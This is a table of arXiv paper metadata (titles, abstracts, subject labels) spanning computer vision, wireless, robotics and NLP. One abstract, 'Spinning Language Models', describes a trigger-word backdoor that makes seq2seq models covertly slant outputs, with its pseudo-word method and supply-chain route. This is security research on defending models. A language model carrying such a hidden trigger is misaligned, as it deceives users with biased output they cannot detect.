id (string) | title (string) | abstract (string) | cs.HC (bool) | cs.CE (bool) | cs.SD (bool) | cs.SI (bool) | cs.AI (bool) | cs.IR (bool) | cs.LG (bool) | cs.RO (bool) | cs.CL (bool) | cs.IT (bool) | cs.SY (bool) | cs.CV (bool) | cs.CR (bool) | cs.CY (bool) | cs.MA (bool) | cs.NE (bool) | cs.DB (bool) | Other (bool) | __index_level_0__ (int64) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1905.02244 | Searching for MobileNetV3 | We present the next generation of MobileNets based on a combination of complementary search techniques as well as a novel architecture design. MobileNetV3 is tuned to mobile phone CPUs through a combination of hardware-aware network architecture search (NAS) complemented by the NetAdapt algorithm and then subsequently improved through novel architecture advances. This paper starts the exploration of how automated search algorithms and network design can work together to harness complementary approaches improving the overall state of the art. Through this process we create two new MobileNet models for release: MobileNetV3-Large and MobileNetV3-Small which are targeted for high and low resource use cases. These models are then adapted and applied to the tasks of object detection and semantic segmentation. For the task of semantic segmentation (or any dense pixel prediction), we propose a new efficient segmentation decoder Lite Reduced Atrous Spatial Pyramid Pooling (LR-ASPP). We achieve new state of the art results for mobile classification, detection and segmentation. MobileNetV3-Large is 3.2% more accurate on ImageNet classification while reducing latency by 15% compared to MobileNetV2. MobileNetV3-Small is 4.6% more accurate while reducing latency by 5% compared to MobileNetV2. MobileNetV3-Large detection is 25% faster at roughly the same accuracy as MobileNetV2 on COCO detection. MobileNetV3-Large LR-ASPP is 30% faster than MobileNetV2 R-ASPP at similar accuracy for Cityscapes segmentation. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 129,926 |
1512.01409 | What Makes it Difficult to Understand a Scientific Literature? | In the artificial intelligence area, one of the ultimate goals is to make computers understand human language and offer assistance. In order to achieve this ideal, researchers of computer science have put forward many models and algorithms attempting to enable machines to analyze and process human natural language on different levels of semantics. Although recent progress in this field offers much hope, we still have to ask whether current research can provide the assistance that people really desire in reading and comprehension. To this end, we conducted a reading comprehension test on two scientific papers which are written in different styles. We use semantic link models to analyze the understanding obstacles that people face in the process of reading and figure out what makes it difficult for humans to understand scientific literature. Through this analysis, we summarized characteristics and problems that readers with different levels of knowledge exhibit when comprehending difficult scientific and technical literature, which can be modeled in a semantic link network. We believe that these characteristics and problems will help us re-examine existing machine models and are helpful in the design of new ones. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 49,810 |
1702.04458 | Decentralized Baseband Processing for Massive MU-MIMO Systems | Achieving high spectral efficiency in realistic massive multi-user (MU) multiple-input multiple-output (MIMO) wireless systems requires computationally-complex algorithms for data detection in the uplink (users transmit to base-station) and beamforming in the downlink (base-station transmits to users). Most existing algorithms are designed to be executed on centralized computing hardware at the base-station (BS), which results in prohibitive complexity for systems with hundreds or thousands of antennas and generates raw baseband data rates that exceed the limits of current interconnect technology and chip I/O interfaces. This paper proposes a novel decentralized baseband processing architecture that alleviates these bottlenecks by partitioning the BS antenna array into clusters, each associated with independent radio-frequency chains, analog and digital modulation circuitry, and computing hardware. For this architecture, we develop novel decentralized data detection and beamforming algorithms that only access local channel-state information and require low communication bandwidth among the clusters. We study the associated trade-offs between error-rate performance, computational complexity, and interconnect bandwidth, and we demonstrate the scalability of our solutions for massive MU-MIMO systems with thousands of BS antennas using reference implementations on a graphic processing unit (GPU) cluster. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 68,259 |
1812.05794 | The Entropy of Artificial Intelligence and a Case Study of AlphaZero from Shannon's Perspective | The recently released AlphaZero algorithm achieves superhuman performance in the games of chess, shogi and Go, which raises two open questions. Firstly, as there is a finite number of possibilities in the game, is there a quantifiable intelligence measurement for evaluating intelligent systems, e.g. AlphaZero? Secondly, AlphaZero introduces sophisticated reinforcement learning and self-play to efficiently encode the possible states; is there a simple information-theoretic model to represent the learning process and offer more insights into fostering strong AI systems? This paper explores these two questions by proposing a simple variant of Shannon's communication model, the concept of intelligence entropy, and the Unified Intelligence-Communication Model, which provide an information-theoretic metric for investigating the intelligence level and also a bound for intelligent agents in the form of Shannon's capacity, namely, the intelligence capacity. This paper then applies the concept and model to AlphaZero as a case study and explains the learning process of an intelligent agent as turbo-like iterative decoding, so that the learning performance of AlphaZero may be quantitatively evaluated. Finally, conclusions are provided along with theoretical and practical remarks. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 116,481 |
2112.09076 | SanMove: Next Location Recommendation via Self-Attention Network | Currently, next location recommendation plays a vital role in location-based social network applications and services. Although many methods have been proposed to solve this problem, three important challenges have not been well addressed so far: (1) most existing methods are based on recurrent networks, which are time-consuming to train on long sequences because they do not allow full parallelism; (2) personalized preferences generally are not considered reasonably; (3) existing methods rarely systematically study how to efficiently utilize various auxiliary information (e.g., user ID and timestamp) in trajectory data and the spatio-temporal relations among non-consecutive locations. To address the above challenges, we propose a novel method named SanMove, a self-attention network based model, to predict the next location via capturing the long- and short-term mobility patterns of users. Specifically, SanMove introduces a long-term preference learning module, and it uses a self-attention module to capture users' long-term mobility patterns, which represent their personalized location preferences. Meanwhile, SanMove uses a spatial-temporal guided non-invasive self-attention (STNOVA) to exploit auxiliary information to learn short-term preferences. We evaluate SanMove on two real-world datasets, and demonstrate that SanMove is not only faster than state-of-the-art RNN-based prediction models but also outperforms the baselines for next location prediction. | false | false | false | true | true | false | true | false | false | false | false | false | false | false | false | false | false | false | 272,028 |
1901.10836 | Do non-free LCD codes over finite commutative Frobenius rings exist? | In this paper, we clarify some aspects of LCD codes in the literature. We first prove that a non-free LCD code does not exist over finite commutative Frobenius local rings. We then obtain a necessary and sufficient condition for the existence of LCD codes over finite commutative Frobenius rings. We later show that a free constacyclic code over a finite chain ring is LCD if and only if it is reversible, and also provide a necessary and sufficient condition for a constacyclic code to be reversible over finite chain rings. We illustrate the minimum Lee-distance of LCD codes over some finite commutative chain rings and demonstrate the results with examples. We also obtain some new optimal $\mathbb{Z}_4$ codes of different lengths which are cyclic LCD codes over $\mathbb{Z}_4$. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 120,118 |
2407.16521 | AMONGAGENTS: Evaluating Large Language Models in the Interactive Text-Based Social Deduction Game | Strategic social deduction games serve as valuable testbeds for evaluating the understanding and inference skills of language models, offering crucial insights into social science, artificial intelligence, and strategic gaming. This paper focuses on creating proxies of human behavior in simulated environments, with Among Us utilized as a tool for studying simulated human behavior. The study introduces a text-based game environment, named AmongAgents, that mirrors the dynamics of Among Us. Players act as crew members aboard a spaceship, tasked with identifying impostors who are sabotaging the ship and eliminating the crew. Within this environment, the behavior of simulated language agents is analyzed. The experiments involve diverse game sequences featuring different configurations of Crewmates and Impostor personality archetypes. Our work demonstrates that state-of-the-art large language models (LLMs) can effectively grasp the game rules and make decisions based on the current context. This work aims to promote further exploration of LLMs in goal-oriented games with incomplete information and complex action spaces, as these settings offer valuable opportunities to assess language model performance in socially driven scenarios. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 475,629 |
2203.07162 | RAUM-VO: Rotational Adjusted Unsupervised Monocular Visual Odometry | Unsupervised learning for monocular camera motion and 3D scene understanding has gained popularity over traditional methods, relying on epipolar geometry or non-linear optimization. Notably, deep learning can overcome many issues of monocular vision, such as perceptual aliasing, low-textured areas, scale-drift, and degenerate motions. Also, concerning supervised learning, we can fully leverage video streams data without the need for depth or motion labels. However, in this work, we note that rotational motion can limit the accuracy of the unsupervised pose networks more than the translational component. Therefore, we present RAUM-VO, an approach based on a model-free epipolar constraint for frame-to-frame motion estimation (F2F) to adjust the rotation during training and online inference. To this end, we match 2D keypoints between consecutive frames using pre-trained deep networks, Superpoint and Superglue, while training a network for depth and pose estimation using an unsupervised training protocol. Then, we adjust the predicted rotation with the motion estimated by F2F using the 2D matches and initializing the solver with the pose network prediction. Ultimately, RAUM-VO shows a considerable accuracy improvement compared to other unsupervised pose networks on the KITTI dataset while reducing the complexity of other hybrid or traditional approaches and achieving comparable state-of-the-art results. | false | false | false | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | 285,356 |
2305.02099 | Joint A-SNN: Joint Training of Artificial and Spiking Neural Networks via Self-Distillation and Weight Factorization | Emerged as a biology-inspired method, Spiking Neural Networks (SNNs) mimic the spiking nature of brain neurons and have received lots of research attention. SNNs deal with binary spikes as their activation and therefore derive extreme energy efficiency on hardware. However, this also leads to an intrinsic obstacle: training SNNs from scratch requires a re-definition of the firing function for computing gradients. Artificial Neural Networks (ANNs), however, are fully differentiable and can be trained with gradient descent. In this paper, we propose a joint training framework of ANN and SNN, in which the ANN can guide the SNN's optimization. This joint framework contains two parts: First, the knowledge inside the ANN is distilled to the SNN by using multiple branches from the networks. Second, we restrict the parameters of the ANN and SNN, where they share partial parameters and learn different singular weights. Extensive experiments over several widely used network structures show that our method consistently outperforms many other state-of-the-art training methods. For example, on the CIFAR100 classification task, the spiking ResNet-18 model trained by our method can reach 77.39% top-1 accuracy with only 4 time steps. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 361,911 |
2110.11876 | Tight and Robust Private Mean Estimation with Few Users | In this work, we study high-dimensional mean estimation under user-level differential privacy, and design an $(\varepsilon,\delta)$-differentially private mechanism using as few users as possible. In particular, we provide a nearly optimal trade-off between the number of users and the number of samples per user required for private mean estimation, even when the number of users is as low as $O(\frac{1}{\varepsilon}\log\frac{1}{\delta})$. Interestingly, this bound on the number of \emph{users} is independent of the dimension (though the number of \emph{samples per user} is allowed to depend polynomially on the dimension), unlike the previous work that requires the number of users to depend polynomially on the dimension. This resolves a problem first proposed by Amin et al. Moreover, our mechanism is robust against corruptions in up to $49\%$ of the users. Finally, our results also apply to optimal algorithms for privately learning discrete distributions with few users, answering a question of Liu et al., and a broader range of problems such as stochastic convex optimization and a variant of stochastic gradient descent via a reduction to differentially private mean estimation. | false | false | false | false | false | false | true | false | false | false | false | false | true | false | false | false | false | true | 262,640 |
2305.19497 | Towards Flow Graph Prediction of Open-Domain Procedural Texts | Machine comprehension of procedural texts is essential for reasoning about the steps and automating the procedures. However, this requires identifying entities within a text and resolving the relationships between the entities. Previous work focused on the cooking domain and proposed a framework to convert a recipe text into a flow graph (FG) representation. In this work, we propose a framework based on the recipe FG for flow graph prediction of open-domain procedural texts. To investigate flow graph prediction performance in non-cooking domains, we introduce the wikiHow-FG corpus from articles on wikiHow, a website of how-to instruction articles. In experiments, we consider using the existing recipe corpus and performing domain adaptation from the cooking to the target domain. Experimental results show that the domain adaptation models achieve higher performance than those trained only on the cooking or target domain data. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 369,552 |
2403.09217 | Rumor Mitigation in Social Media Platforms with Deep Reinforcement Learning | Social media platforms have become one of the main channels where people disseminate and acquire information, whose reliability is severely threatened by rumors widespread in the network. Existing approaches such as suspending users or broadcasting real information to combat rumors either incur high cost or disturb users. In this paper, we introduce a novel rumor mitigation paradigm, where we intervene on only a minimal set of links in the social network to decelerate the propagation of rumors, countering misinformation with low business cost and user awareness. A knowledge-informed agent embodying rumor propagation mechanisms is developed, which intervenes in the social network with a graph neural network for capturing information flow in the social media platforms and a policy network for selecting links. Experiments on real social media platforms demonstrate that the proposed approach can effectively alleviate the influence of rumors, substantially reducing the affected populations by over 25%. Codes for this paper are released at https://github.com/tsinghua-fib-lab/DRL-Rumor-Mitigation. | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 437,680 |
2111.06719 | On Transferability of Prompt Tuning for Natural Language Processing | Prompt tuning (PT) is a promising parameter-efficient method to utilize extremely large pre-trained language models (PLMs), which can achieve comparable performance to full-parameter fine-tuning by only tuning a few soft prompts. However, PT requires much more training time than fine-tuning. Intuitively, knowledge transfer can help to improve the efficiency. To explore whether we can improve PT via prompt transfer, we empirically investigate the transferability of soft prompts across different downstream tasks and PLMs in this work. We find that (1) in zero-shot setting, trained soft prompts can effectively transfer to similar tasks on the same PLM and also to other PLMs with a cross-model projector trained on similar tasks; (2) when used as initialization, trained soft prompts of similar tasks and projected prompts of other PLMs can significantly accelerate training and also improve the performance of PT. Moreover, to explore what decides prompt transferability, we investigate various transferability indicators and find that the overlapping rate of activated neurons strongly reflects the transferability, which suggests how the prompts stimulate PLMs is essential. Our findings show that prompt transfer is promising for improving PT, and further research shall focus more on prompts' stimulation to PLMs. The source code can be obtained from https://github.com/thunlp/Prompt-Transferability. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 266,152 |
2410.22049 | On the Synthesis of Reactive Collision-Free Whole-Body Robot Motions: A Complementarity-based Approach | This paper is about generating motion plans for high degree-of-freedom systems that account for collisions along the entire body. A particular class of mathematical programs with complementarity constraints becomes useful in this regard. Optimization-based planners can tackle confined-space trajectory planning while being cognizant of robot constraints. However, introducing obstacles in this setting transforms the formulation into a non-convex problem (oftentimes with ill-posed bilinear constraints), which is non-trivial in a real-time setting. To this end, we present the FLIQC (Fast LInear Quadratic Complementarity based) motion planner. Our planner employs a novel motion model that captures the entire rigid robot as well as the obstacle geometry and ensures non-penetration between the surfaces due to the imposed constraint. We perform thorough comparative studies with the state-of-the-art, which demonstrate improved performance. Extensive simulation and hardware experiments validate our claim of generating continuous and reactive motion plans at 1 kHz for modern collaborative robots with constant minimal parameters. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 503,477 |
1806.05950 | Hyper Space Exploration - A Multicriterial Quantitative Trade-Off Analysis for System Design in Complex Environment | Successful engineering requires environmentally adapted procedural and architectural approaches. While dealing with complicated issues has become an engineering standard, mastering uncertainties in complex environments is still a major issue. Global trends, such as an increasing rate of disruptive technology changes or the merging of technology fields, however, reinforce the importance of this complex habitat. Missing experience in unknown technological territory faces engineers with two questions of paramount importance: 1) How can the best architectural solution within the space of potential alternatives be identified? 2) How can a proof-of-concept for considered solutions be provided prior to implementation? Mastering the risks and uncertainties related to this lack of knowledge is one of the most prominent tasks in such projects. The paper presents a novel methodology of system design in complex environments called Hyper Space Exploration (HSE). The HSE approach combines methods of virtual prototyping with design-of-virtual-experiments based studies for statistical learning. Virtual prototyping allows early feedback on system behavior with a proof-of-concept prior to implementation. Statistical learning enables system architects to systematically build up the space of potential solution alternatives, model the effects of design and use-case variables on target indicators in complex territory, quantify target indicator trade-offs, and finally identify Pareto-optimal system solutions. The first part of the paper characterizes engineering challenges in complex environments. Section two presents the HSE methodology with its two major constituents: workflow and tool chain. Section three outlines the first successful HSE applications that already proved its capabilities and universality. The final section four gives an outlook to further HSE applications as well as methodological future HSE extensions. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 100,591 |
1705.09411 | Identifying Critical Risks of Cascading Failures in Power Systems | Potential critical risks of cascading failures in power systems can be identified by exposing those critical electrical elements on which certain initial disturbances may cause maximum disruption to power transmission networks. In this work, we investigate cascading failures in power systems described by the direct current (DC) power flow equations, while initial disturbances take the form of altering admittance of elements. The disruption is quantified with the remaining transmission power at the end of cascading process. In particular, identifying the critical elements and the corresponding initial disturbances causing the worst-case cascading blackout is formulated as a dynamic optimization problem (DOP) in the framework of optimal control theory, where the entire propagation process of cascading failures is put under consideration. An Identifying Critical Risk Algorithm (ICRA) based on the maximum principle is proposed to solve the DOP. Simulation results on the IEEE 9-Bus and the IEEE 14-Bus test systems are presented to demonstrate the effectiveness of the algorithm. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 74,191 |
2106.04223 | Outage Performance of Multi-UAV Relaying-based Imperfect Hardware Hybrid Satellite-Terrestrial Networks | In this paper, we consider an imperfect hardware hybrid satellite-terrestrial network (HSTN) where the satellite communication with a ground user equipment (UE) is aided by the multiple amplify-and-forward (AF) three-dimensional ($3$D) mobile unmanned aerial vehicle (UAV) relays. Herein, we consider that all transceiver nodes are corrupted by the radio frequency hardware impairments (RFHI). Further, a stochastic mixed mobility (MM) model is employed to characterize the instantaneous location of $3$D mobile UAV relays in a cylindrical cell with UE lying at its center on ground plane. Taking into account the aggregate RFHI model for satellite and UAV relay transceivers and the random $3$D distances-based path loss for UAV relay-UE links, we investigate the outage probability (OP) and corresponding asymptotic outage behaviour of the system under an opportunistic relay selection scheme in a unified form for shadowed-Rician satellite links' channels and Nakagami-\emph{m} as well as Rician terrestrial links' channels. We corroborate theoretical analysis by simulations. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 239,644 |
2110.05525 | Synergistic Offline-Online Control Synthesis via Local Gaussian Process Regression | Autonomous systems often have complex and possibly unknown dynamics due to, e.g., black-box components. This leads to unpredictable behaviors and makes control design with performance guarantees a major challenge. This paper presents a data-driven control synthesis framework for such systems subject to linear temporal logic on finite traces (LTLf) specifications. The framework combines a baseline (offline) controller with a novel online controller and refinement procedure that improves the baseline guarantees as new data is collected. The baseline controller is computed offline on an uncertain abstraction constructed using Gaussian process (GP) regression on a given dataset. The offline controller provides a lower bound on the probability of satisfying the LTLf specification, which may be far from optimal due to both discretization and regression errors. The synergy arises from the online controller using the offline abstraction along with the current state and new data to choose the next best action. The online controller may improve the baseline guarantees since it avoids the discretization error and reduces regression error as new data is collected. The new data are also used to refine the abstraction and offline controller using local GP regression, which significantly reduces the computation overhead. Evaluations show the efficacy of the proposed offline-online framework, especially when compared against the offline controller. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 260,300 |
2401.15486 | Pulse-Width Modulation Technique With Harmonic Injection in the Modulating Wave and Discontinuous Frequency Modulation for the Carrier Wave for Multilevel Inverters: An Application to the Reduction of Acoustic Noise in Induction Motors | An implementation of a harmonic injection pulse width modulation frequency-modulated triangular carrier (HIPWM-FMTC) control strategy applied to a multilevel power inverter feeding an asynchronous motor is presented. The aim was to justify the reduction in acoustic noise emitted by the machine compared with other strategies in the technical literature. In addition, we checked how the THD at the inverter output was reduced compared to the other control techniques used as a reference. The proposed strategy is based on frequency modulation of the triangular carrier. The main advantage of the proposed method is that only one control parameter is required for modifying the electrical spectrum. Therefore, the mechanical natural frequencies and spatial harmonics of the machine can be avoided, and acoustic noise can be reduced. The effectiveness of the technique was demonstrated after laboratory validation by comparing the acoustic results for a 1 kW motor. The results obtained from the laboratory tests are presented and compared with those of other acoustic measurements using different PWM strategies. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 424,466 |
2112.05224 | Spinning Language Models: Risks of Propaganda-As-A-Service and Countermeasures | We investigate a new threat to neural sequence-to-sequence (seq2seq) models: training-time attacks that cause models to "spin" their outputs so as to support an adversary-chosen sentiment or point of view -- but only when the input contains adversary-chosen trigger words. For example, a spinned summarization model outputs positive summaries of any text that mentions the name of some individual or organization. Model spinning introduces a "meta-backdoor" into a model. Whereas conventional backdoors cause models to produce incorrect outputs on inputs with the trigger, outputs of spinned models preserve context and maintain standard accuracy metrics, yet also satisfy a meta-task chosen by the adversary. Model spinning enables propaganda-as-a-service, where propaganda is defined as biased speech. An adversary can create customized language models that produce desired spins for chosen triggers, then deploy these models to generate disinformation (a platform attack), or else inject them into ML training pipelines (a supply-chain attack), transferring malicious functionality to downstream models trained by victims. To demonstrate the feasibility of model spinning, we develop a new backdooring technique. It stacks an adversarial meta-task onto a seq2seq model, backpropagates the desired meta-task output to points in the word-embedding space we call "pseudo-words," and uses pseudo-words to shift the entire output distribution of the seq2seq model. We evaluate this attack on language generation, summarization, and translation models with different triggers and meta-tasks such as sentiment, toxicity, and entailment. Spinned models largely maintain their accuracy metrics (ROUGE and BLEU) while shifting their outputs to satisfy the adversary's meta-task. We also show that, in the case of a supply-chain attack, the spin functionality transfers to downstream models. | false | false | false | false | false | false | true | false | true | false | false | false | true | false | false | false | false | false | 270,774 |
2002.07595 | Market Power in Convex Hull Pricing | The start-up costs of many kinds of generators lead to complex cost structures, which in turn yield severe market loopholes in the locational marginal price (LMP) scheme. Convex hull pricing (a.k.a. extended LMP) is proposed to improve market efficiency by providing the minimal uplift payment to the generators. In this letter, we consider a stylized model where all generators share the same generation capacity. We analyze the generators' possible strategic behaviors in such a setting, and then propose an index for market power quantification in convex hull pricing schemes. | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 164,512 |
2107.08228 | Weakly-supervised Part-Attention and Mentored Networks for Vehicle
Re-Identification | Vehicle re-identification (Re-ID) aims to retrieve images with the same vehicle ID across different cameras. Current part-level feature learning methods typically detect vehicle parts via uniform division, outside tools, or attention modeling. However, such part features often require expensive additional annotations and cause sub-optimal performance in case of unreliable part mask predictions. In this paper, we propose a weakly-supervised Part-Attention Network (PANet) and Part-Mentored Network (PMNet) for Vehicle Re-ID. Firstly, PANet localizes vehicle parts via part-relevant channel recalibration and cluster-based mask generation without vehicle part supervisory information. Secondly, PMNet leverages teacher-student guided learning to distill vehicle part-specific features from PANet and performs multi-scale global-part feature extraction. During inference, PMNet can adaptively extract discriminative part features without part localization by PANet, preventing unstable part mask predictions. We address this Re-ID issue as a multi-task problem and adopt Homoscedastic Uncertainty to learn the optimal weighting of ID losses. Experiments are conducted on two public benchmarks, showing that our approach, which requires no extra annotations, outperforms recent methods by an average increase of 3.0% in CMC@5 on VehicleID and over 1.4% in mAP on VeRi776. Moreover, our method can extend to the occluded vehicle Re-ID task and exhibits good generalization ability. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 246,661 |
2007.10467 | Second-Order Pooling for Graph Neural Networks | Graph neural networks have achieved great success in learning node representations for graph tasks such as node classification and link prediction. Graph representation learning requires graph pooling to obtain graph representations from node representations. It is challenging to develop graph pooling methods due to the variable sizes and isomorphic structures of graphs. In this work, we propose to use second-order pooling as graph pooling, which naturally solves the above challenges. In addition, compared to existing graph pooling methods, second-order pooling is able to use information from all nodes and collect second-order statistics, making it more powerful. We show that direct use of second-order pooling with graph neural networks leads to practical problems. To overcome these problems, we propose two novel global graph pooling methods based on second-order pooling; namely, bilinear mapping and attentional second-order pooling. In addition, we extend attentional second-order pooling to hierarchical graph pooling for more flexible use in GNNs. We perform thorough experiments on graph classification tasks to demonstrate the effectiveness and superiority of our proposed methods. Experimental results show that our methods improve the performance significantly and consistently. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | false | false | false | 188,279 |
2007.03154 | Discretization-Aware Architecture Search | The search cost of neural architecture search (NAS) has been largely reduced by weight-sharing methods. These methods optimize a super-network with all possible edges and operations, and determine the optimal sub-network by discretization, \textit{i.e.}, pruning off weak candidates. The discretization process, performed on either operations or edges, incurs significant inaccuracy and thus the quality of the final architecture is not guaranteed. This paper presents discretization-aware architecture search (DA\textsuperscript{2}S), with the core idea being adding a loss term to push the super-network towards the configuration of desired topology, so that the accuracy loss brought by discretization is largely alleviated. Experiments on standard image classification benchmarks demonstrate the superiority of our approach, in particular, under imbalanced target network configurations that were not studied before. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | true | false | false | 185,964 |
1807.08555 | Iterative Interaction Training for Segmentation Editing Networks | Automatic segmentation has great potential to facilitate morphological measurements while simultaneously increasing efficiency. Nevertheless, users often want to edit the segmentation to their own needs and need different tools for this. Methods have been developed to edit the segmentations of automatic methods based on user input, primarily for binary segmentations. Here, however, we present a unique training strategy for convolutional neural networks (CNNs) trained on top of an automatic method to enable interactive segmentation editing that is not limited to binary segmentation. By utilizing a robot-user during training, we closely mimic realistic use cases to achieve optimal editing performance. In addition, we show that increasing the number of iterative interactions during the training process up to ten improves the segmentation editing performance substantially. Furthermore, we compare our segmentation editing CNN (interCNN) to state-of-the-art interactive segmentation algorithms and show superior or on-par performance. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 103,565 |
2205.12676 | Evaluating the Diversity, Equity and Inclusion of NLP Technology: A Case
Study for Indian Languages | In order for NLP technology to be widely applicable, fair, and useful, it needs to serve a diverse set of speakers across the world's languages, be equitable, i.e., not unduly biased towards any particular language, and be inclusive of all users, particularly in low-resource settings where compute constraints are common. In this paper, we propose an evaluation paradigm that assesses NLP technologies across all three dimensions. While diversity and inclusion have received attention in recent literature, equity is currently unexplored. We propose to address this gap using the Gini coefficient, a well-established metric used for estimating societal wealth inequality. Using our paradigm, we highlight the distressed state of current technologies for Indian (IN) languages (a linguistically large and diverse set, with a varied speaker population), across all three dimensions. To improve upon these metrics, we demonstrate the importance of region-specific choices in model building and dataset creation, and more importantly, propose a novel, generalisable approach to optimal resource allocation during fine-tuning. Finally, we discuss steps to mitigate these biases and encourage the community to employ multi-faceted evaluation when building linguistically diverse and equitable technologies. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 298,663 |
2111.02258 | Multi-Agent Deep Reinforcement Learning For Optimising Energy Efficiency
of Fixed-Wing UAV Cellular Access Points | Unmanned Aerial Vehicles (UAVs) promise to become an intrinsic part of next generation communications, as they can be deployed to provide wireless connectivity to ground users to supplement existing terrestrial networks. The majority of the existing research into the use of UAV access points for cellular coverage considers rotary-wing UAV designs (i.e. quadcopters). However, we expect fixed-wing UAVs to be more appropriate for connectivity purposes in scenarios where long flight times are necessary (such as for rural coverage), as fixed-wing UAVs rely on a more energy-efficient form of flight when compared to the rotary-wing design. As fixed-wing UAVs are typically incapable of hovering in place, their deployment optimisation involves optimising their individual flight trajectories in a way that allows them to deliver high quality service to the ground users in an energy-efficient manner. In this paper, we propose a multi-agent deep reinforcement learning approach to optimise the energy efficiency of fixed-wing UAV cellular access points while still allowing them to deliver high-quality service to users on the ground. In our decentralized approach, each UAV is equipped with a Dueling Deep Q-Network (DDQN) agent which can adjust the 3D trajectory of the UAV over a series of timesteps. By coordinating with their neighbours, the UAVs adjust their individual flight trajectories in a manner that optimises the total system energy efficiency. We benchmark the performance of our approach against a series of heuristic trajectory planning strategies, and demonstrate that our method can improve the system energy efficiency by as much as 70%. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 264,814 |
2306.14392 | ContentCTR: Frame-level Live Streaming Click-Through Rate Prediction
with Multimodal Transformer | In recent years, live streaming platforms have gained immense popularity as they allow users to broadcast their videos and interact in real time with hosts and peers. Due to the dynamic changes of live content, accurate recommendation models are crucial for enhancing user experience. However, most previous works treat the live stream as a whole item and explore Click-Through-Rate (CTR) prediction at the item level, neglecting the dynamic changes that occur even within the same live room. In this paper, we propose a ContentCTR model that leverages a multimodal transformer for frame-level CTR prediction. First, we present an end-to-end framework that can make full use of multimodal information, including visual frames, audio, and comments, to identify the most attractive live frames. Second, to prevent the model from collapsing into a mediocre solution, a novel pairwise loss function with first-order difference constraints is proposed to utilize the contrastive information existing in the highlight and non-highlight frames. Additionally, we design a temporal text-video alignment module based on Dynamic Time Warping to eliminate noise caused by the ambiguity and non-sequential alignment of visual and textual information. We conduct extensive experiments on both real-world scenarios and public datasets, and our ContentCTR model outperforms traditional recommendation models in capturing real-time content changes. Moreover, we deploy the proposed method on our company platform, and the results of online A/B testing further validate its practical significance. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 375,665 |
2210.03799 | Supervised and Unsupervised Learning of Audio Representations for Music
Understanding | In this work, we provide a broad comparative analysis of strategies for pre-training audio understanding models for several tasks in the music domain, including labelling of genre, era, origin, mood, instrumentation, key, pitch, vocal characteristics, tempo and sonority. Specifically, we explore how the domain of pre-training datasets (music or generic audio) and the pre-training methodology (supervised or unsupervised) affects the adequacy of the resulting audio embeddings for downstream tasks. We show that models trained via supervised learning on large-scale expert-annotated music datasets achieve state-of-the-art performance in a wide range of music labelling tasks, each with novel content and vocabularies. This can be done in an efficient manner with models containing less than 100 million parameters that require no fine-tuning or reparameterization for downstream tasks, making this approach practical for industry-scale audio catalogs. Within the class of unsupervised learning strategies, we show that the domain of the training dataset can significantly impact the performance of representations learned by the model. We find that restricting the domain of the pre-training dataset to music allows for training with smaller batch sizes while achieving state-of-the-art in unsupervised learning -- and in some cases, supervised learning -- for music understanding. We also corroborate that, while achieving state-of-the-art performance on many tasks, supervised learning can cause models to specialize to the supervised information provided, somewhat compromising a model's generality. | false | false | true | false | true | true | true | false | false | false | false | false | false | false | false | false | false | true | 322,176 |
cs/0506033 | An Event-driven Operator Model for Dynamic Simulation of Construction
Machinery | Prediction and optimisation of a wheel loader's dynamic behaviour is a challenge due to tightly coupled, non-linear subsystems of different technical domains. Furthermore, a simulation regarding performance, efficiency, and operability cannot be limited to the machine itself, but has to include operator, environment, and work task. This paper presents some results of our approach to an event-driven simulation model of a human operator. Describing the task and the operator model independently of the machine's technical parameters, gives the possibility to change whole sub-system characteristics without compromising the relevance and validity of the simulation. | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 538,766 |
1812.03621 | Learning Non-Uniform Hypergraph for Multi-Object Tracking | The majority of Multi-Object Tracking (MOT) algorithms based on the tracking-by-detection scheme do not use higher order dependencies among objects or tracklets, which makes them less effective in handling complex scenarios. In this work, we present a new near-online MOT algorithm based on non-uniform hypergraph, which can model different degrees of dependencies among tracklets in a unified objective. The nodes in the hypergraph correspond to the tracklets and the hyperedges with different degrees encode various kinds of dependencies among them. Specifically, instead of setting the weights of hyperedges with different degrees empirically, they are learned automatically using the structural support vector machine algorithm (SSVM). Several experiments are carried out on various challenging datasets (i.e., PETS09, ParkingLot sequence, SubwayFace, and MOT16 benchmark), to demonstrate that our method achieves favorable performance against the state-of-the-art MOT methods. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 116,062 |
